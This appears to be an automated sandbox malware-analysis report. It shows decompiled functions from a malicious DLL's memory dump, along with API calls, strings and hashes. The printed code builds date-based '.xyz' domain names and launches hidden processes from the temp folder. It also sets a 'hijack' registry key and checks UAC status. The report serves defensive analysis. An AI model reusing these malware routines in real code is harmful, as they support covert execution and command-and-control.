                                                                                                                                                0x10022705
                                                                                                                                                0x1002270a
                                                                                                                                                0x10022714
                                                                                                                                                0x10022723
                                                                                                                                                0x10022731
                                                                                                                                                0x10022737
                                                                                                                                                0x10022744
                                                                                                                                                0x1002274f
                                                                                                                                                0x10022759

                                                                                                                                                APIs
                                                                                                                                                • _memset.LIBCMT ref: 10022624
                                                                                                                                                • GetLocalTime.KERNEL32(00000000,?,?,http://), ref: 10022645
                                                                                                                                                • _sprintf.LIBCMT ref: 10022666
                                                                                                                                                  • Part of subcall function 1001A480: _memset.LIBCMT ref: 1001A4BB
                                                                                                                                                  • Part of subcall function 1001A480: _memset.LIBCMT ref: 1001A4CE
                                                                                                                                                  • Part of subcall function 1001A480: _strlen.LIBCMT ref: 1001A4DA
                                                                                                                                                  • Part of subcall function 1001A480: _strlen.LIBCMT ref: 1001A4FD
                                                                                                                                                  • Part of subcall function 1001A480: _sprintf.LIBCMT ref: 1001A56C
                                                                                                                                                  • Part of subcall function 1001A480: _memset.LIBCMT ref: 1001A5B6
                                                                                                                                                  • Part of subcall function 1000CA30: ___sbh_find_block.LIBCMT ref: 1000CA59
                                                                                                                                                  • Part of subcall function 1000CA30: ___sbh_free_block.LIBCMT ref: 1000CA68
                                                                                                                                                  • Part of subcall function 1000CA30: RtlFreeHeap.NTDLL(00000000,?,103301D0,Function_0000CA30,1001322F,00000000), ref: 1000CA98
                                                                                                                                                  • Part of subcall function 1000CA30: GetLastError.KERNEL32(?,?,?,?,?,?,?,103301D0), ref: 1000CAA9
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.389655641.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                • Associated: 00000004.00000002.389597489.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.389720562.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390103749.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390114476.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390121768.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _memset$_sprintf_strlen$ErrorFreeHeapLastLocalTime___sbh_find_block___sbh_free_block
                                                                                                                                                • String ID: .xyz/$changenewsys%04d%02d%02d$http://
                                                                                                                                                • API String ID: 984892819-377150047
                                                                                                                                                • Opcode ID: 01893e789d72bc6740a2a515bf2c20aba140765a16ad56bf668e112c6c4f99eb
                                                                                                                                                • Instruction ID: 81f1802f078645e924587200c16c269d37407c15be22a51fe8bac89201a43415
                                                                                                                                                • Opcode Fuzzy Hash: 01893e789d72bc6740a2a515bf2c20aba140765a16ad56bf668e112c6c4f99eb
                                                                                                                                                • Instruction Fuzzy Hash: 08412975C04228ABDB14CBA4DC51BEEB7B4EF08744F4081E9F509A7291EB346B84CF91
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 1001FEA0, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 59COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 67%
                                                                                                                                                			E1001FEA0(void* __ebx, void* __edi, void* __esi, void* __eflags, char _a4) {
				char _v8;
				intOrPtr _v16;
				char _v44;
				char _v311;
				char _v312;
				char _v575;
				char _v576;
				void* _t30;
				intOrPtr _t43;
				void* _t50;

				_t50 = __eflags;
				_t41 = __edi;
				_push(0xffffffff);
				_push(E10022AF1);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t43;
				_v8 = 0;
				_v576 = 0;
				E1000CF20(__edi,  &_v575, 0, 0x103);
				_v312 = 0;
				E1000CF20(_t41,  &_v311, 0, 0x103);
				E1001A600(__ebx, _t41, __esi, _t50,  &_v44);
				GetTempPathA(0x104,  &_v576);
				_push(E100011E0( &_a4));
				_push("0011");
				_push(E100011E0( &_v44));
				E1000CC93(_t41,  &_v312, "%s%s %s %s",  &_v576);
				E1001A1D0(_t50,  &_v312);
				E100011A0( &_v44);
				_v8 = 0xffffffff;
				_t30 = E100011A0( &_a4);
				 *[fs:0x0] = _v16;
				return _t30;
			}













                                                                                                                                                0x1001fea0
                                                                                                                                                0x1001fea0
                                                                                                                                                0x1001fea3
                                                                                                                                                0x1001fea5
                                                                                                                                                0x1001feb0
                                                                                                                                                0x1001feb1
                                                                                                                                                0x1001febe
                                                                                                                                                0x1001fec5
                                                                                                                                                0x1001feda
                                                                                                                                                0x1001fee2
                                                                                                                                                0x1001fef7
                                                                                                                                                0x1001ff03
                                                                                                                                                0x1001ff17
                                                                                                                                                0x1001ff25
                                                                                                                                                0x1001ff26
                                                                                                                                                0x1001ff33
                                                                                                                                                0x1001ff47
                                                                                                                                                0x1001ff56
                                                                                                                                                0x1001ff61
                                                                                                                                                0x1001ff66
                                                                                                                                                0x1001ff70
                                                                                                                                                0x1001ff78
                                                                                                                                                0x1001ff82

                                                                                                                                                APIs
                                                                                                                                                • _memset.LIBCMT ref: 1001FEDA
                                                                                                                                                • _memset.LIBCMT ref: 1001FEF7
                                                                                                                                                  • Part of subcall function 1001A600: _memset.LIBCMT ref: 1001A651
                                                                                                                                                  • Part of subcall function 1001A600: GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 1001A667
                                                                                                                                                  • Part of subcall function 1001A600: _sprintf.LIBCMT ref: 1001A6A5
                                                                                                                                                • GetTempPathA.KERNEL32(00000104,00000000), ref: 1001FF17
                                                                                                                                                • _sprintf.LIBCMT ref: 1001FF47
                                                                                                                                                  • Part of subcall function 1001A1D0: _memset.LIBCMT ref: 1001A1E5
                                                                                                                                                  • Part of subcall function 1001A1D0: _memset.LIBCMT ref: 1001A209
                                                                                                                                                  • Part of subcall function 1001A1D0: CreateProcessA.KERNEL32(00000000,1001FD2F,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 1001A22B
                                                                                                                                                  • Part of subcall function 1001A1D0: CloseHandle.KERNEL32(?), ref: 1001A239
                                                                                                                                                  • Part of subcall function 1001A1D0: CloseHandle.KERNEL32(?), ref: 1001A243
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.389655641.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                • Associated: 00000004.00000002.389597489.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.389720562.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390103749.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390114476.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390121768.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _memset$CloseHandle_sprintf$CreateFileModuleNamePathProcessTemp
                                                                                                                                                • String ID: %s%s %s %s$0011
                                                                                                                                                • API String ID: 3552933064-2132516514
                                                                                                                                                • Opcode ID: 1d9b09cfca39a609c0d1c4b04c45a75235e20a1c535110d9b18c7a09704cf595
                                                                                                                                                • Instruction ID: 67bf52551a5dba2018d4aeac715347b552078b1bc39281a068a263b1fa8e7f35
                                                                                                                                                • Opcode Fuzzy Hash: 1d9b09cfca39a609c0d1c4b04c45a75235e20a1c535110d9b18c7a09704cf595
                                                                                                                                                • Instruction Fuzzy Hash: D411B6B6C00248ABE714EB90DC96FDD777CEB14750F4041A4FA19661C1EB747B48CBA1
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 1001A1D0, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46processCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                			E1001A1D0(void* __eflags, CHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				CHAR* _v24;
				struct _STARTUPINFOA _v100;
				void* _t27;

				_v24 = 0;
				E1000CF20(_t27,  &_v100, 0, 0x44);
				_v100.cb = 0x44;
				_v100.dwFlags = 1;
				_v100.wShowWindow = 0;
				E1000CF20(_t27,  &_v20, 0, 0x10);
				if(CreateProcessA(0, _a4, 0, 0, 0, 0, 0, 0,  &_v100,  &_v20) != 0) {
					CloseHandle(_v20.hThread);
					CloseHandle(_v20);
					_v24 = 1;
				}
				return _v24;
			}







                                                                                                                                                0x1001a1d6
                                                                                                                                                0x1001a1e5
                                                                                                                                                0x1001a1ed
                                                                                                                                                0x1001a1f4
                                                                                                                                                0x1001a1fb
                                                                                                                                                0x1001a209
                                                                                                                                                0x1001a233
                                                                                                                                                0x1001a239
                                                                                                                                                0x1001a243
                                                                                                                                                0x1001a249
                                                                                                                                                0x1001a249
                                                                                                                                                0x1001a256

                                                                                                                                                APIs
                                                                                                                                                • _memset.LIBCMT ref: 1001A1E5
                                                                                                                                                • _memset.LIBCMT ref: 1001A209
                                                                                                                                                • CreateProcessA.KERNEL32(00000000,1001FD2F,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 1001A22B
                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 1001A239
                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 1001A243
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.389655641.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                • Associated: 00000004.00000002.389597489.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.389720562.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390103749.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390114476.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390121768.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CloseHandle_memset$CreateProcess
                                                                                                                                                • String ID: D
                                                                                                                                                • API String ID: 1151464618-2746444292
                                                                                                                                                • Opcode ID: 7eeb0e77ddf9764189b8f2e5d2f15a657f104191f59f7ae2d7ae820ce566c070
                                                                                                                                                • Instruction ID: ef4eb28381490467371c772dbf4cc47cae63647d7d2172f01b5caa4c4fe940a9
                                                                                                                                                • Opcode Fuzzy Hash: 7eeb0e77ddf9764189b8f2e5d2f15a657f104191f59f7ae2d7ae820ce566c070
                                                                                                                                                • Instruction Fuzzy Hash: 8601E1B590031DABEB00DBD0DC8AFEE77B9FB44704F144518FA04AB285D7B5A904CBA5
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 1001AEB0, Relevance: 8.9, APIs: 7, Instructions: 168COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                			E1001AEB0(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, signed int _a8) {
				intOrPtr _v8;
				signed int _v12;
				intOrPtr* _v16;
				intOrPtr* _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr* _v36;
				intOrPtr* _v40;
				intOrPtr* _v44;
				intOrPtr* _t105;
				void* _t174;
				void* _t176;

				_t172 = __edi;
				_t122 = __ebx;
				_v16 = _a4;
				_t4 = _v16 + 4; // 0x7d83ec45
				_v24 =  *_t4;
				_v12 = 0;
				_v20 =  *_v16 + 0x78;
				if( *((intOrPtr*)(_v20 + 4)) != 0) {
					_v8 = _v24 +  *_v20;
					if( *(_v8 + 0x18) == 0 ||  *((intOrPtr*)(_v8 + 0x14)) == 0) {
						SetLastError(0x7f);
						return 0;
					} else {
						if((_a8 >> 0x00000010 & 0x0000ffff) != 0) {
							if( *(_v8 + 0x18) != 0) {
								if( *((intOrPtr*)(_v16 + 0x30)) != 0) {
									L19:
									_t70 = _v16 + 0x30; // 0x51e84d8b
									_v28 = E1000DF58(_t122,  &_a8,  *_t70,  *(_v8 + 0x18), 8, E1001AA60);
									if(_v28 != 0) {
										_v12 =  *(_v28 + 4) & 0x0000ffff;
										L22:
										if(_v12 <=  *((intOrPtr*)(_v8 + 0x14))) {
											return _v24 +  *((intOrPtr*)(_v24 +  *((intOrPtr*)(_v8 + 0x1c)) + _v12 * 4));
										}
										SetLastError(0x7f);
										return 0;
									}
									SetLastError(0x7f);
									return 0;
								}
								_v36 = _v24 +  *((intOrPtr*)(_v8 + 0x20));
								_v40 = _v24 +  *((intOrPtr*)(_v8 + 0x24));
								_t105 = L1000CE56(__ebx, _v24 +  *((intOrPtr*)(_v8 + 0x24)), __edi, __esi,  *(_v8 + 0x18) << 3);
								_t176 = _t174 + 4;
								_v44 = _t105;
								 *((intOrPtr*)(_v16 + 0x30)) = _v44;
								if(_v44 != 0) {
									_v32 = 0;
									while(_v32 <  *(_v8 + 0x18)) {
										 *_v44 = _v24 +  *_v36;
										 *((short*)(_v44 + 4)) =  *_v40;
										_v32 = _v32 + 1;
										_v36 = _v36 + 4;
										_v40 = _v40 + 2;
										_v44 = _v44 + 8;
									}
									_t66 = _v16 + 0x30; // 0x51e84d8b
									E1000D9D0( *(_v8 + 0x18), _t172,  *_t66,  *(_v8 + 0x18), 8, E1001AA90);
									_t174 = _t176 + 0x10;
									goto L19;
								}
								SetLastError(0xe);
								return 0;
							}
							SetLastError(0x7f);
							return 0;
						}
						if((_a8 & 0xffff) >=  *((intOrPtr*)(_v8 + 0x10))) {
							_v12 = (_a8 & 0xffff) -  *((intOrPtr*)(_v8 + 0x10));
							goto L22;
						}
						SetLastError(0x7f);
						return 0;
					}
				}
				SetLastError(0x7f);
				return 0;
			}
















                                                                                                                                                0x1001aeb0
                                                                                                                                                0x1001aeb0
                                                                                                                                                0x1001aeb9
                                                                                                                                                0x1001aebf
                                                                                                                                                0x1001aec2
                                                                                                                                                0x1001aec5
                                                                                                                                                0x1001aed4
                                                                                                                                                0x1001aede
                                                                                                                                                0x1001aef7
                                                                                                                                                0x1001af01
                                                                                                                                                0x1001af0e
                                                                                                                                                0x00000000
                                                                                                                                                0x1001af1b
                                                                                                                                                0x1001af26
                                                                                                                                                0x1001af6a
                                                                                                                                                0x1001af87
                                                                                                                                                0x1001b049
                                                                                                                                                0x1001b05a
                                                                                                                                                0x1001b06a
                                                                                                                                                0x1001b071
                                                                                                                                                0x1001b086
                                                                                                                                                0x1001b089
                                                                                                                                                0x1001b092
                                                                                                                                                0x00000000
                                                                                                                                                0x1001b0b2
                                                                                                                                                0x1001b096
                                                                                                                                                0x00000000
                                                                                                                                                0x1001b09c
                                                                                                                                                0x1001b075
                                                                                                                                                0x00000000
                                                                                                                                                0x1001b07b
                                                                                                                                                0x1001af96
                                                                                                                                                0x1001afa2
                                                                                                                                                0x1001afaf
                                                                                                                                                0x1001afb4
                                                                                                                                                0x1001afb7
                                                                                                                                                0x1001afc0
                                                                                                                                                0x1001afc7
                                                                                                                                                0x1001afd8
                                                                                                                                                0x1001b005
                                                                                                                                                0x1001b01b
                                                                                                                                                0x1001b026
                                                                                                                                                0x1001afe7
                                                                                                                                                0x1001aff0
                                                                                                                                                0x1001aff9
                                                                                                                                                0x1001b002
                                                                                                                                                0x1001b002
                                                                                                                                                0x1001b03d
                                                                                                                                                0x1001b041
                                                                                                                                                0x1001b046
                                                                                                                                                0x00000000
                                                                                                                                                0x1001b046
                                                                                                                                                0x1001afcb
                                                                                                                                                0x00000000
                                                                                                                                                0x1001afd1
                                                                                                                                                0x1001af6e
                                                                                                                                                0x00000000
                                                                                                                                                0x1001af74
                                                                                                                                                0x1001af39
                                                                                                                                                0x1001af5b
                                                                                                                                                0x00000000
                                                                                                                                                0x1001af5b
                                                                                                                                                0x1001af3d
                                                                                                                                                0x00000000
                                                                                                                                                0x1001af43
                                                                                                                                                0x1001af01
                                                                                                                                                0x1001aee2
                                                                                                                                                0x00000000

                                                                                                                                                APIs
                                                                                                                                                • SetLastError.KERNEL32(0000007F,?,?,?,?,?,?,?,100207FE), ref: 1001AEE2
                                                                                                                                                • SetLastError.KERNEL32(0000007F,?,?,?,?,?,?,?,100207FE), ref: 1001AF0E
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.389655641.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                • Associated: 00000004.00000002.389597489.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.389720562.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390103749.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390114476.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390121768.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ErrorLast
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1452528299-0
                                                                                                                                                • Opcode ID: 0f455f5a677937442b34762e6ef3df5d8741d0011f32a81b29d44a10479100eb
                                                                                                                                                • Instruction ID: 0b553024b132d835b53bcc3061d3cd906e00f9f3519ff007c74d2c873b7cba87
                                                                                                                                                • Opcode Fuzzy Hash: 0f455f5a677937442b34762e6ef3df5d8741d0011f32a81b29d44a10479100eb
                                                                                                                                                • Instruction Fuzzy Hash: A071D274A00249EFDB04CF94C994AAEB7F1FF48304F618199E915AB341D735EE81CBA5
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 1001FDC0, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 71%
                                                                                                                                                			E1001FDC0(void* __ebx, void* __edi, void* __esi, void* __eflags, char _a4) {
				char _v8;
				intOrPtr _v16;
				char _v44;
				char _v311;
				char _v312;
				char _v575;
				char _v576;
				void* _t30;
				intOrPtr _t43;
				void* _t50;

				_t50 = __eflags;
				_t41 = __edi;
				_push(0xffffffff);
				_push(E10022ADF);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t43;
				_v8 = 0;
				_v576 = 0;
				E1000CF20(__edi,  &_v575, 0, 0x103);
				_v312 = 0;
				E1000CF20(_t41,  &_v311, 0, 0x103);
				E1001A600(__ebx, _t41, __esi, _t50,  &_v44);
				GetTempPathA(0x104,  &_v576);
				_push(E100011E0( &_a4));
				_push(E100011E0( &_v44));
				E1000CC93(_t41,  &_v312, "%s%s 200 %s",  &_v576);
				E1001A1D0(_t50,  &_v312);
				E100011A0( &_v44);
				_v8 = 0xffffffff;
				_t30 = E100011A0( &_a4);
				 *[fs:0x0] = _v16;
				return _t30;
			}













                                                                                                                                                0x1001fdc0
                                                                                                                                                0x1001fdc0
                                                                                                                                                0x1001fdc3
                                                                                                                                                0x1001fdc5
                                                                                                                                                0x1001fdd0
                                                                                                                                                0x1001fdd1
                                                                                                                                                0x1001fdde
                                                                                                                                                0x1001fde5
                                                                                                                                                0x1001fdfa
                                                                                                                                                0x1001fe02
                                                                                                                                                0x1001fe17
                                                                                                                                                0x1001fe23
                                                                                                                                                0x1001fe37
                                                                                                                                                0x1001fe45
                                                                                                                                                0x1001fe4e
                                                                                                                                                0x1001fe62
                                                                                                                                                0x1001fe71
                                                                                                                                                0x1001fe7c
                                                                                                                                                0x1001fe81
                                                                                                                                                0x1001fe8b
                                                                                                                                                0x1001fe93
                                                                                                                                                0x1001fe9d

                                                                                                                                                APIs
                                                                                                                                                • _memset.LIBCMT ref: 1001FDFA
                                                                                                                                                • _memset.LIBCMT ref: 1001FE17
                                                                                                                                                  • Part of subcall function 1001A600: _memset.LIBCMT ref: 1001A651
                                                                                                                                                  • Part of subcall function 1001A600: GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 1001A667
                                                                                                                                                  • Part of subcall function 1001A600: _sprintf.LIBCMT ref: 1001A6A5
                                                                                                                                                • GetTempPathA.KERNEL32(00000104,00000000), ref: 1001FE37
                                                                                                                                                • _sprintf.LIBCMT ref: 1001FE62
                                                                                                                                                  • Part of subcall function 1001A1D0: _memset.LIBCMT ref: 1001A1E5
                                                                                                                                                  • Part of subcall function 1001A1D0: _memset.LIBCMT ref: 1001A209
                                                                                                                                                  • Part of subcall function 1001A1D0: CreateProcessA.KERNEL32(00000000,1001FD2F,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 1001A22B
                                                                                                                                                  • Part of subcall function 1001A1D0: CloseHandle.KERNEL32(?), ref: 1001A239
                                                                                                                                                  • Part of subcall function 1001A1D0: CloseHandle.KERNEL32(?), ref: 1001A243
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.389655641.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                • Associated: 00000004.00000002.389597489.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.389720562.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390103749.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390114476.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390121768.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _memset$CloseHandle_sprintf$CreateFileModuleNamePathProcessTemp
                                                                                                                                                • String ID: %s%s 200 %s
                                                                                                                                                • API String ID: 3552933064-2772210913
                                                                                                                                                • Opcode ID: 6fdab2317e9cd2bac910ebd3285d2722730a43824be4673878b61a9fbd94f7f4
                                                                                                                                                • Instruction ID: 9fe4303920e8fa691f1d764f20975ef76de67e86ffe0158f2e00fcfb91787ceb
                                                                                                                                                • Opcode Fuzzy Hash: 6fdab2317e9cd2bac910ebd3285d2722730a43824be4673878b61a9fbd94f7f4
                                                                                                                                                • Instruction Fuzzy Hash: 341198B6C00208ABE714EB90DC56FDE7778EB14750F4441A4F615A61C5EB747B88CBA1
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 1001F990, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 44COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 91%
                                                                                                                                                			E1001F990(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				char _v12;
				char _v275;
				char _v276;
				void* __ebp;
				void* _t20;
				void* _t37;

				_t37 = __eflags;
				_t28 = __edi;
				_v276 = 0;
				E1000CF20(__edi,  &_v275, 0, 0x103);
				_v12 = 0x104;
				E1001A2F0( &_v276,  &_v12);
				E1000CD96( &_v276,  &_v276, 0x104, "hijack");
				_v8 = E1001A480(__ebx,  &_v276, _t28, __esi, _t37,  &_v276);
				_t20 = E1000CC93(_t28, _a4, "SOFTWARE\\Microsoft\\%s", _v8);
				_t38 = _v8;
				if(_v8 != 0) {
					_push(_v8);
					return E1000CA30(__ebx, _t28, __esi, _t38);
				}
				return _t20;
			}










                                                                                                                                                0x1001f990
                                                                                                                                                0x1001f990
                                                                                                                                                0x1001f999
                                                                                                                                                0x1001f9ae
                                                                                                                                                0x1001f9b6
                                                                                                                                                0x1001f9c8
                                                                                                                                                0x1001f9e1
                                                                                                                                                0x1001f9f8
                                                                                                                                                0x1001fa08
                                                                                                                                                0x1001fa10
                                                                                                                                                0x1001fa14
                                                                                                                                                0x1001fa19
                                                                                                                                                0x00000000
                                                                                                                                                0x1001fa1f
                                                                                                                                                0x1001fa25

                                                                                                                                                APIs
                                                                                                                                                • _memset.LIBCMT ref: 1001F9AE
                                                                                                                                                  • Part of subcall function 1001A2F0: RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Cryptography,00000000,00000101,00000000), ref: 1001A319
                                                                                                                                                • _strcat_s.LIBCMT ref: 1001F9E1
                                                                                                                                                  • Part of subcall function 1001A480: _memset.LIBCMT ref: 1001A4BB
                                                                                                                                                  • Part of subcall function 1001A480: _memset.LIBCMT ref: 1001A4CE
                                                                                                                                                  • Part of subcall function 1001A480: _strlen.LIBCMT ref: 1001A4DA
                                                                                                                                                  • Part of subcall function 1001A480: _strlen.LIBCMT ref: 1001A4FD
                                                                                                                                                  • Part of subcall function 1001A480: _sprintf.LIBCMT ref: 1001A56C
                                                                                                                                                  • Part of subcall function 1001A480: _memset.LIBCMT ref: 1001A5B6
                                                                                                                                                • _sprintf.LIBCMT ref: 1001FA08
                                                                                                                                                  • Part of subcall function 1000CA30: ___sbh_find_block.LIBCMT ref: 1000CA59
                                                                                                                                                  • Part of subcall function 1000CA30: ___sbh_free_block.LIBCMT ref: 1000CA68
                                                                                                                                                  • Part of subcall function 1000CA30: RtlFreeHeap.NTDLL(00000000,?,103301D0,Function_0000CA30,1001322F,00000000), ref: 1000CA98
                                                                                                                                                  • Part of subcall function 1000CA30: GetLastError.KERNEL32(?,?,?,?,?,?,?,103301D0), ref: 1000CAA9
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.389655641.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                • Associated: 00000004.00000002.389597489.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.389720562.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390103749.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390114476.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390121768.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _memset$_sprintf_strlen$ErrorFreeHeapLastOpen___sbh_find_block___sbh_free_block_strcat_s
                                                                                                                                                • String ID: SOFTWARE\Microsoft\%s$hijack
                                                                                                                                                • API String ID: 3138967372-3622423033
                                                                                                                                                • Opcode ID: ada38b5ab26f5dc62f486429ffaac0b96da48a560580f8f5e3c1f71cb78a86e2
                                                                                                                                                • Instruction ID: 9399b5cfcd873c48396239d23a26fdd32b2e9067639008cfe42ca2b6aed02eb6
                                                                                                                                                • Opcode Fuzzy Hash: ada38b5ab26f5dc62f486429ffaac0b96da48a560580f8f5e3c1f71cb78a86e2
                                                                                                                                                • Instruction Fuzzy Hash: 7D0152FAC0020CA7DB15D7A0EC47FE97378DB58304F0404A9E61856141F6B5A7C8CB92
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 1001D240, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 41registryCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                			E1001D240() {
				void* _v8;
				int _v12;
				signed int _v16;
				int _v20;
				char _v24;

				_v12 = 4;
				_v20 = 4;
				_v16 = 0;
				_v8 = 0;
				_v24 = 0;
				if(RegOpenKeyExW(0x80000002, L"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\", 0, 0x20019,  &_v8) == 0) {
					if(RegQueryValueExW(_v8, L"EnableLUA", 0,  &_v12,  &_v24,  &_v20) == 0) {
						_v16 = 0 | _v24 == 0x00000001;
					}
					RegCloseKey(_v8);
				}
				return _v16;
			}








                                                                                                                                                0x1001d246
                                                                                                                                                0x1001d24d
                                                                                                                                                0x1001d254
                                                                                                                                                0x1001d25b
                                                                                                                                                0x1001d262
                                                                                                                                                0x1001d286
                                                                                                                                                0x1001d2a7
                                                                                                                                                0x1001d2b2
                                                                                                                                                0x1001d2b2
                                                                                                                                                0x1001d2b9
                                                                                                                                                0x1001d2b9
                                                                                                                                                0x1001d2c5

                                                                                                                                                APIs
                                                                                                                                                • RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\,00000000,00020019,00000000), ref: 1001D27E
                                                                                                                                                • RegQueryValueExW.ADVAPI32(00000000,EnableLUA,00000000,00000004,00000000,00000004), ref: 1001D29F
                                                                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 1001D2B9
                                                                                                                                                Strings
                                                                                                                                                • SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\, xrefs: 1001D274
                                                                                                                                                • EnableLUA, xrefs: 1001D296
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.389655641.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                • Associated: 00000004.00000002.389597489.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.389720562.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390103749.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390114476.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390121768.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CloseOpenQueryValue
                                                                                                                                                • String ID: EnableLUA$SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\
                                                                                                                                                • API String ID: 3677997916-2194944742
                                                                                                                                                • Opcode ID: 266f08e0f126cb4b8deb597b18c5a4e6f0f9f98ecfb3ee9ea26cd0a9d97fb6d8
